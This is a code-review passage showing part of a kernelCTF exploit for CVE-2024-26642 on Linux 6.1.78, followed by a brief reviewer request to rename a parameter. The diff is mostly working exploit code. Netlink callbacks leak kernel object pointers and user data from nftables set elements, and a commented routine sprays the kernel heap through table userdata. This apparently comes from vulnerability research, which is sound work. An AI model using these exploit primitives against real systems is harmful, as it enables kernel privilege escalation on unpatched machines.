pocs/linux/kernelctf/CVE-2024-26642_lts/exploit/lts-6.1.78/exploit.c

```diff
@@ -0,0 +1,512 @@
+        memset(tb_msg2, 0, NFTA_SET_MAX * 8);
+        nla_parse_nested(tb_msg2, NFTA_SET_MAX, tb_msg[NFTA_SET_ELEM_LIST_ELEMENTS],NULL);
+
+        struct nlattr * tb_msg3[NFTA_SET_MAX+1];
+        memset(tb_msg3, 0, NFTA_SET_MAX * 8);
+        nla_parse_nested(tb_msg3, NFTA_SET_MAX, tb_msg2[1],NULL);
+        char *val = malloc(nla_len(tb_msg3[NFTA_SET_ELEM_OBJREF]));
+        nla_memcpy(val, tb_msg3[NFTA_SET_ELEM_OBJREF], nla_len(tb_msg3[NFTA_SET_ELEM_OBJREF]));
+        printf("Get ops : %llx\n", *(uint64_t *)val);
+        leak_ops = *(uint64_t *)val;
+    }
+    else
+        printf("No NFTA_SET_ELEM_LIST_ELEMENTS\n");
+    return NL_OK;
+}
+
+int nl_callback_find_target_setelem(struct nl_msg* recv_msg, void* arg)
+{
+
+    struct nlmsghdr * ret_hdr = nlmsg_hdr(recv_msg);
+    struct nlattr * tb_msg[NFTA_SET_MAX+1];
+    memset(tb_msg, 0, NFTA_SET_MAX * 8);
+    //printf("Get message back!\n");
+
+    if (ret_hdr->nlmsg_type == NLMSG_ERROR) {
+        //printf("Received NLMSG_ERROR message!\n");
+        return NL_STOP;
+    }
+
+    struct nlattr *attr = (void *)ret_hdr + nlmsg_total_size(sizeof(struct nfgenmsg));
+    int attrlen = ret_hdr->nlmsg_len - nlmsg_total_size(sizeof(struct nfgenmsg));
+    nla_parse(tb_msg, NFTA_SET_MAX, attr, attrlen, NULL);
+    char * table_name=NULL;
+    char * set_name=NULL;
+
+    if (tb_msg[NFTA_SET_ELEM_LIST_ELEMENTS]){
+        struct nlattr * tb_msg2[NFTA_SET_MAX+1];
+        memset(tb_msg2, 0, NFTA_SET_MAX * 8);
+        nla_parse_nested(tb_msg2, NFTA_SET_MAX, tb_msg[NFTA_SET_ELEM_LIST_ELEMENTS],NULL);
+
+        struct nlattr * tb_msg3[NFTA_SET_MAX+1];
+        memset(tb_msg3, 0, NFTA_SET_MAX * 8);
+        nla_parse_nested(tb_msg3, NFTA_SET_MAX, tb_msg2[1],NULL);
+        char *val = malloc(nla_len(tb_msg3[NFTA_SET_ELEM_KEY]));
+        nla_memcpy(val, tb_msg3[NFTA_SET_ELEM_KEY], nla_len(tb_msg3[NFTA_SET_ELEM_KEY]));
+        //printf("Get key : %llx\n", *(uint64_t *)(val+4));
+        uint32_t udata_len = nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]);
+        if(udata_len != 0xa1)
+		printf("udata len : %d\n",udata_len);
+        if(udata_len > 0xb0){
+            //get leak
+            printf("udata len : %d\n",udata_len);
+            leak_data = malloc(nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]));
+            memset(leak_data,0,nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]));
+            nla_memcpy(leak_data, tb_msg3[NFTA_SET_ELEM_USERDATA], nla_len(tb_msg3[NFTA_SET_ELEM_USERDATA]));
+            printf("Target key : %llx\n",*(uint64_t *)(val+4));
+        }
+    }
+    else
+        printf("No NFTA_SET_ELEM_LIST_ELEMENTS\n");
+    return NL_OK;
+}
+
+/*
+ Spray the heap through the udata of nft_table. In nftables, when creating a table, 
+ you can let the kernel malloc and fill any size of heap memory by using NFTA_TABLE_USERDATA 
+ (the corresponding code is in the function nf_tables_newtable). 
+*/
+
+void spray_tables(struct nl_sock * socket, int len, char *udata, int size){
```

Comment:
Could you rename len to something like.. count to make it clearer

Reply:
OK